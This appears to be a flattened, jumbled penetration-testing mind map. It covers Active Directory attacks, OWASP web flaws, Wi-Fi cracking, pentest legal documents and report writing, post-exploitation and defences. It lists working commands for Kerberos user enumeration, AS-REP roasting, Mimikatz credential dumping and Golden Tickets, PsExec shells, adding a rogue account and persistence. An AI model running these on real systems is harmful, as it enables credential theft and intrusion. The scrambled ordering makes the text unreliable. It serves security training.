LLMNR

Responder NBT-NS
DNS/MDNS
LLMNR Poisoning
Disable LLMNR and NBT-NS
Defences Require Network Access Control
Require Strong User Passwords
Capturing NTLMv2 Hashes Responder
Password Cracking (Hashcat)
Host Discovery Nessus
SMB Signing Disabled
Nmap script
HTTP Off
Responder
SMB Off
Crack offline
Password Hash Cracker
SAM Hashes Dump CrackStation
https://crackstation.net/
Pass-the-Hash
Interactive shell -i Netcat
SMB Relay Attacks ntlmrelayx Powershell
Command execute -c Reverse shell msf web_delivery
other
Execute .exe file -e msfvenom meterpreter
It will completely stop the attack
Enable SMB signing on all devices
Performance issues with file copy
Stops the attack
Nmap Defences Disable NTLM Authentication
If Kerberos stops working, back to NTLM
Netdiscover
Admin only logging into their accounts / servers / domain controllers
arp-scan Account tiering
Scanning Local Admin restriction No local Admin prevent lateral movement
Masscan
exploit/windows/smb/psexec
Metasploit msfconsole
exploit/windows/smb/psexec_psh
Nessus
Gain Shell Access psexec.py AV noisy
Nikto
smbexec.py Less noisy / Half-shell
w3af
wmiexec.py Less noisy / Half-shell
Dirbuster
aclpwn restore
Dirb mitm6
HTTP/HTTPS new user creation on DC
Gobuster LDAP Relay
info dump (loot folder)
Source Code ntlmrelayx
delegate access
Burp Suite IPv6 Attacks
Disable IPv6 Possible unwanted side effects Define Block Rules / instead of Allow Rules
Test Server upload Davtest
Disable wpad if not in use
Msfconsole - smb_version Scanning & Defenses
Enable LDAP signing and channel binding usually not enabled
smbclient SMB Enumeration
Enumeration Put admin users into the protected users group prevent impersonation or delegation
enum4linux (not working properly)
Get loot back
Connection attempt SSH
Get account created on Domain Controller Easy win
anonymous access Initial Attack Vectors mitm6
FTP Early morning
binary
Lunch time
ipconfig /all
Are they giving us hashes ?
arp -a
Network Are those hashes easy to crack ?
route print See how the network responds Easy win
netstat -ano
might have had Pentest before
Google If LMNR is disabled
might know common attacks
Searchsploit Responder
Vulnerability Research Looking for hashes
Exploit Database
Early morning
Metasploit - search
Lunch time
Nessus scan
WHOIS
Nmap scan
nslookup Target Validation
Morning Pickup targets / hashes for SMB Relay attacks
dnsrecon Other Attack Vectors and Strategies Day begins with Look for SMB open / signing disbled
Afternoon Relay hashes
Google Fu
Loot at logins Check for default creds
dig
Check for Vulns
Nmap
Finding Subdomains Scan-to-computer feature
Sublist3r
Lot of people don't secure their printers
Bluto Sweep entire network for websites
Look for printers might get domain admin off
crt.sh Is user domain admin on that printer ?
Overview dump creds in clear text get passwords for SMB user
Nmap
HTTP_Version (Metasploit) using individual user accounts
Wappalyzer
Jenkins Instances Often wide open
WhatWeb Fingerprinting
Use this if scans are taking too long
BuiltWith
Less likely to be picked-up
Netcat
Search for low hanging fruits
HaveIbeenPwned
Think outside the box
Breach-Parse Try all possible ways in
Enumerate as much as you can
WeLeakInfo Data Breaches
Don't just focus on the exploit
scylla.sh
nmap --script=smb-enum-users.nse
leakedsource.ru
GetADUsers.py -dc-ip 10.10.10.161 htb.local/
Hunter.io (Domain Search) Email Address Gathering
kerbrute userenum --dc 10.10.222.155 -d spookysec.local usernames.txt -t 100
bugcrowd.com Identify Target
Attempt to list and get TGTs for those users that
email:*bbc.co.uk have t he pr oper t y “Do not r equi r e Ker ber os
scylla.sh
email:username* pr eaut hent i cat i on”set ( UF_DONT_REQUI RE_PREAUTH) GetNPUsers.py -dc-ip 10.10.10.161 htb.local/
Users Enumeration
https://github.com/hmaverickadams/breach-parse Hashcat
Breach-Parse Breached Credentials
./breach-parse.sh @gmail.com gmail.txt "~/Downloads/BreachCompilation/data" Get TGT hash, for those users with such configuration GetNPUsers.py -request -dc-ip 10.10.10.161 htb.local/ John the Ripper
Reconaissance
https://dehashed.com DEHASHED Evil-winrm
Get a shell
The Harvester OSINT psexec
Sublist3r Kerbrute
Brute force discovery of users, passwords and password spray
crt.sh Metasploit auxiliary/gather/kerberos_enumusers
Subdomains Easy-win Strategy
OWASP Amass ntlmrelayx
Abuse WriteDACL permissions
Tomnomnom HTTPprobe PowerView
Active Directory
BuiltWith Get Hashes
Identify Website Exploiting Kerberos ASREPRoasting GetNPUsers.py
Wappalizer Technologies Crack the hashes Shares Enum smbclient
whatweb crackmapexec check where you can authenticate
Information Gathering with Burp Suite NTDS.DIT psexec
Elevate Privileges Secretsdump secrets dump Pass-the-Hash
Google Fu evil-winrm
LinkedIn Get system shell
Social Media
Twitter PowerView
Enumeration
nmapAutomator Bloodhound
SAM Dumping
https://github.com/Tib3rius/AutoRecon Automated
secretsdump LSA Secrets Dumping
run.sh script
Dump the Hashes DPAPI_SYSTEM KEY
Metasploit psexec meterpreter hashdump
Mutual Non-Disclosure Agreement (NDA)
Hashcat
Performance Objectives
Crack NTLM Hashes Password Hash Cracker
Outline the Responsabilities Master Service Agreement (MSA) CrackStation
https://crackstation.net/
https://www.rapid7.com/legal/msa/ Rapid7 MSA example
Pwn3d! or green [+] Try to authenticate with Psexec get a shell
Activities Sales crackmapexec
not Pwn3d! no SMB access
Deliverables Pass-the-Hash
Statement of Work (SOW) Cannot pass NTLMv2
Timelines no cracking needed
Quotation Pwn3d! Try get a shell with Psexec
Others: Sample Report, Recommendation Letters etc.. Pass-the-Password crackmapexec not Pwn3d! no SMB access
Will cover specifics of you testing Dump local SAM hashes
What we can and can't do Mimikatz
Token Impersonation
What we can and can't attack (IP addresses) Meterpreter - Incognito
Rules of Engagement (ROE) Before you test
unless that's a specific thing the client wants to test Denial of Service Request TGT, provide NTLM hash
Common 'don'ts'
often set aside as its own assessment Social Engineering Receive TGT encrypted with krbtgt hash

You can not start your penetration test until the Rules of Engagement document is signed Kerberoasting Request TGS for Server (Presents TGT) GetUserSPNs.py
Receive TGS encrypted with Server's account hash
We are not responsible for
anything happening after Crack the hash
We are under a time limited engagement It's Snapshot in time prompt off
We are targeting what we can in that period of time smbclient recurse on
Common Legal Documents
Timeframe mget *
Guidelines Assessment Overview GPP / cPassword Groups.xml cpassword gpp_decrypt
(high level) Attack
Planning Invoke-GPP
Discovery smb_enum_gpp module in Metasploit
Phases of Pentest
Attacking privilege::debug

Reporting NTLM
sekurlsa::logonpasswords Logged in accounts
What we are attacking
Assessments Components wdigest
What type of penetration test it is
lsadump::sam
Findings Severity Ratings
lsadump::sam /patch
IPs Scope Post-Compromise
SAM dump shell with Metasploit
No Denial of Service attacks Scope Exclusions
secretsdump.py
Did the client had to assist us in any way ? Client Allowances
sam dump not working crackmapexec
C-level executive windows/system32/config/SAM
CISO Intended for people with no technical background windows/system32/config/SECURITY
Findings Report After you test just download the SAM
CEO windows/system32/config/SYSTEM
Quick summary about vulnerabilities you found, Credential Dumping crack with secretsdump.py
and what they could lead to
lsadump::lsa /patch
What you managed to do Actions SID
Attack Summary
Recommendations LSA dump NTLM
Legal Documents
We were scanning Executive Summary and Report Writing opens cmd prompt
they identified and blocked us Give them kudos where they need it Security Strengths Pass-the-Ticket misc::cmd
lsadump::lsa /inject /name:krbtgt Pull down krbtgt account dir \\THEPUNISHER\c$
Missing Multi-Factor Authentication Access any computer
Golden Ticket psexec.exe PsExec64.exe -accepteula \\THEPUNISHER cmd.exe shell
Weak Password Policy Persistence
Security Weaknesses
Unrestricted Logon Attempts Mimikatz Silver Ticket Stealthier
No-technical people will understand Identify weaknesses at a high level Usernames
ntds.dit
Vulnerabilities by Impact Charts Passwords
Share technical details weak password policy
Crack passwords offline % we are able to crack
Intended for technical people Why do we dump ? strong password policy
Exploitation Proof of Concept
Chained exploit of attacks
Penetration Testing Exploitation Golden Ticket attack Kerberos Ticket Granting Ticket
References Pass-the-Hash
Technical Summary
Who Over-Pass-the-Hash

Vector Remediation Features Pass-the-Ticket

Golden Ticket
Action
Silver Ticket
Additional Reports and Scans (Informational)
Avoid re-using local admin password
'How to' video
https://www.youtube.com/watch?v=EOoBAq6z4Zk on writing a pentest report Limit account re-use Disable Guest and Administrator accounts

https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report Sample Pentest Report Limit who is a local administrator

The longer the better (>14 characters)
Legal Documentation
https://github.com/trustedsec/physical-docs for Physical Security Testing Pass Attack Utilize strong passwords Avoid using common words
I like long sentences
No password Check out/in sensitive accounts when needed
Separation of networks Privilege Access Management (PAM) Automatically rotate passwords on check out and check in
How well is the network segmented Guest Network Mitigation Limits pass attacks as hash/password is strong and costantly rotated
Reduced funtionalities Limit user/group token creation permissions
Access Employs' things / IPs / servers Token Impersonation Account tiering
Open network Local admin restriction
Hidden networks Strong Passwords
Kerberoasting
Evaluate what networks are around Walk around Least privilege
Rogue Devices Spiking
WPS WPA2 PSK Fuzzing
Place wireless card in monitor mode Finding the Offset
Channel 1, 6 and 11 are the most used Buffer Overflow Overwriting the EIP
(no overlap) Channel
Finding Bad Characters
BSSID Discover info about network
Finding the Right Module
SSID
Generating Shellcode / Getting Root
Select network and capture data
Metasploit
Speed-up the process Perform Deauth attack Hacking Process
Hydra
Capture WPA handshake Wi-Fi
Crdential Stuffing
Substitute 1 with i. 0 with O Company Name Brute Force Attacks
Password Spraying
Phone numbers
Many companies use https://github.com/danielmiessler/SecLists
Street address something familiar to them
https://github.com/initstring/passphrase-wordlist
CEWL Create a wordlist from their website Attempt to crack the handshake
Strength evaluation Password dumping
WPA2 PSK
Password dumping in memory
rockyou.txt Weak Passwords Kiwi
Hash dumping
WPA2 Enterprise
Golden Tickets
Metasploit
Password dumping
./run.sh tesla.com Assetfinder
Finding Subdomains Password dumping in memory
Amass Mimikats
Hash dumping
HTTProbe Find Alive Domains Credentials
Enumeration Golden Tickets
GoWitness Screenshot Websites
Default Creds Common Bad Password List
Subjack Subdomain takeover
CEWL
Waybackurls Scraping Wayback data Word List Generator
Cupp Common User Passwords Profiler
Parameterized Statements
Metasploit smb_ms17_010
Sanitized Input SQL Injection Eternal Blue
MS17_010 AutoBlue alternative to metasploit
Blind SQL Injection
smbclient
Credential Stuffing
SAM
Brute Forcing or other automated attacks
SAM SECURITY
Weak or well-known Passwords
SYSTEM
Weak or Ineffective Credential Recovery
secretsdump
knowledge-based answers Weak forgot-password processes Broken Authentication
John
Missing or Ineffective two-factor authentication Hashes Dumping / Cracking Hashcat
Session ID exposed in URL
crackmapexec Pass-The-Hash
Does not rotate Session ID after successful login
psexec Pass-The-Hash
Dows not properly invalidate Session IDs during logout or inactivity Session Fixation
Web Applications Password Hash Cracker
User Sessions or Authentication Tokens CrackStation
https://crackstation.net/
Find all directories dirbuster
Privilege Escalation
Search for 'key' 'keys' 'password' 'passw'
Response tab navigate all directories BurpSuite Stealing &
HTTP Strict Transport Security (HSTS) Response Headers Sensitive Data Exposure Tokens Manipulation Metasploit Incognito
nmap --script=ssl-enum-ciphers -p 443 tesla.com nmap SQL Injection
WEB
https://securityheaders.com XXS
Attacking Systems that parse XML Input
Abuse SYSTEM entity and get malitious XML External Entities (XXE)
dos, local file disclosure, remote code execution, and more
User gets access to somewhere they shouldn't
Are you able to bypass access ?
Can you access admin areas or even other user areas from an account ? Broken Access Control
unauthenticated, authenticated, admin
IDOR - Insecure Direct Object Reference OWASP Top Ten
Disclosure of Sensitive Information Default Credentials
Application should not throw errors Stack Traces - Error Handling
Left behind applications
Left behind directories Unnecessary features
Security Misconfiguration
Default features not in use
Out-of-date Software
Unnecessary ports open, activated accounts
File upload Deprecated Interface
Reflected XSS
Client-side
DOM XSS
Stored XSS Server-side
Cross-Site Scripting (XSS)
Encoding
Filtering
Preventing XSS
Validating
Sanitization
Serialization
Deserialization Insecure Deserialization
ysoserial
Software is vulnerable, unsuported, or out of date
No frequent scan for vulnerabilities Using Components with Known Vulnerabilities
No Patching, no fix, no update
Have Logs, Auditable Events
Track anyone logging into the application
Track failed login attempts Insufficient Logging & Monitoring
Monitor if anyine is attacking your application
Serialization

run persistence -h
exploit/windows/local/persistence Persistence Scripts
exploit/windows/local/registry_persistence
run scheduleme Maintaining Access
Scheduled Tasks
run schtaskabuse
net user hacker password123 /add Add a user
route print
ipconfig connect to target psexec
arp -a
run autoroute -s 169.254.0.0/24 Metasploit
Post-Exploitation
run autoroute -p
poc use auxiliary/scanner/portscan/tcp Pivoting
proxychains
SSH Pivoting
Remove executables, scripts, and added files
Make the System/Network as
Remove malware, rootkits, and added user accounts it was when you entered it Covering Tracks
Set settings back to original configurations